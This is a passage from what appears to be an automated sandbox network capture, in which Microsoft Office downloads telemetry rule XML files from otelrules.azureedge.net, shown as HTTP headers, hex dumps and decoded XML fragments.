                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:33 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1952
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                            x-ms-request-id: ba33cc4f-e01e-0052-2e6f-28d9df000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181233Z-r1755647c66kcsqh9hy6eyp6kw00000003k000000000d27m
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:33 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            80192.168.2.44983213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:33 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:33 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 174
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                                                            x-ms-request-id: 071448c9-d01e-0028-2702-297896000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181233Z-r1755647c66x2fg5vpbex0bd8400000006v000000000700b
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:33 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            81192.168.2.44983413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:33 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:33 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 958
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                            x-ms-request-id: c6fd9367-401e-008c-7f80-2686c2000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181233Z-r1755647c66mmrln9nsykf75u800000004e000000000bvd5
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:33 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            82192.168.2.44983513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:33 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:33 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 501
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                            x-ms-request-id: 170621ef-f01e-003f-351f-28d19d000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181233Z-17fbfdc98bblzxqcphe71tp4qw00000000ug00000000331x
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:33 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            83192.168.2.44983613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:33 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:33 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:33 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 2592
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                            x-ms-request-id: c21b0bdf-c01e-008e-186f-287381000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181233Z-17fbfdc98bbp77nqf5g2c5aavs00000004zg00000000cbh4
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:33 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            84192.168.2.44983713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:33 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:34 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 3342
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                                            x-ms-request-id: d72005e7-a01e-0002-1a61-285074000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-r1755647c66vxbtprd2g591tyg000000053g0000000039z9
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:34 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            85192.168.2.44983913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:34 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:34 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                            x-ms-request-id: f473ee8a-401e-00ac-6cf0-260a97000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-17fbfdc98bbwj6cp6df5812g4s00000006ug00000000eybb
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:34 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            86192.168.2.44984013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:34 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:34 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                                            x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-r1755647c66kcsqh9hy6eyp6kw00000003gg00000000gypf
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:34 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            87192.168.2.44983813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:34 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:34 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 2284
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                            x-ms-request-id: 1515cbe5-b01e-0084-6467-28d736000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-17fbfdc98bb5d4fn785en176rg00000005g0000000002dzc
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:34 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            88192.168.2.44984113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:34 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:34 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                            x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-r1755647c66ss75qkr31zpy1kc0000000550000000000be2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
